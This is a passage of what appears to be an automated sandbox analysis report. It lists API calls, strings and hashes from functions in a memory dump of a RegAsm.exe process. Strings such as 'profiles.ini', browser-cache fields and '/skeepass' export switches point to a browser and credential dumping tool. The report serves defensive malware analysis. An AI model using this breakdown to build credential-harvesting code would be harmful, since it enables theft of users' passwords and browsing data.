                                          • wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 0040426E
                                          • memset.MSVCRT ref: 004042CD
                                          • memset.MSVCRT ref: 004042E2
                                          • _snwprintf.MSVCRT ref: 004042FE
                                          • wcscpy.MSVCRT ref: 00404311
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                          • API String ID: 2454223109-1580313836
                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                          • API String ID: 4054529287-3175352466
                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintf$memset$wcscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          • API String ID: 2000436516-3842416460
                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          • API String ID: 1043902810-0
                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • free.MSVCRT ref: 0040E49A
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                          • memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                          • wcschr.MSVCRT ref: 0040E3B8
                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                          • API String ID: 3849927982-2252543386
                                          • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                          • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                          • _snwprintf.MSVCRT ref: 0044488A
                                          • wcscpy.MSVCRT ref: 004448B4
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@??3@_snwprintfwcscpy
                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                          • API String ID: 2899246560-1542517562
                                          • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                          • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                          • memcmp.MSVCRT ref: 004092D9
                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                          • memcmp.MSVCRT ref: 0040933B
                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                          • memcmp.MSVCRT ref: 00409411
                                          • memcmp.MSVCRT ref: 00409429
                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                          • memcmp.MSVCRT ref: 004094AC
                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                          • String ID:
                                          • API String ID: 3715365532-3916222277
                                          • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                          • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          • memset.MSVCRT ref: 004085CF
                                          • memset.MSVCRT ref: 004085F1
                                          • memset.MSVCRT ref: 00408606
                                          • strcmp.MSVCRT ref: 00408645
                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                          • memset.MSVCRT ref: 0040870E
                                          • strcmp.MSVCRT ref: 0040876B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                          • CloseHandle.KERNEL32(?), ref: 004087A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                          • String ID: ---
                                          • API String ID: 3437578500-2854292027
                                          • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                          • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0041087D
                                          • memset.MSVCRT ref: 00410892
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                          • DeleteObject.GDI32(?), ref: 004109D0
                                          • DeleteObject.GDI32(?), ref: 004109D6
                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          • API String ID: 1010922700-0
                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                          • malloc.MSVCRT ref: 004186B7
                                          • free.MSVCRT ref: 004186C7
                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                          • free.MSVCRT ref: 004186E0
                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                          • malloc.MSVCRT ref: 004186FE
                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                          • free.MSVCRT ref: 00418716
                                          • free.MSVCRT ref: 0041872A
                                          • free.MSVCRT ref: 00418749
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$FullNamePath$malloc$Version
                                          • String ID: |A
                                          • API String ID: 3356672799-1717621600
                                          • Opcode ID: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                          • Opcode Fuzzy Hash: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          • API String ID: 2081463915-1959339147
                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 004121FF
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                          • SelectObject.GDI32(?,?), ref: 00412251
                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                          • SetCursor.USER32(00000000), ref: 004122BC
                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                          • String ID:
                                          • API String ID: 1700100422-0
                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                          • String ID:
                                          • API String ID: 552707033-0
                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: %%0.%df
                                          • API String ID: 3473751417-763548558
                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                          • GetTickCount.KERNEL32 ref: 0040610B
                                          • GetParent.USER32(?), ref: 00406136
                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                          • String ID: A
                                          • API String ID: 2892645895-3554254475
                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                          • memset.MSVCRT ref: 0040DA23
                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                          • String ID: caption
                                          • API String ID: 973020956-4135340389
                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
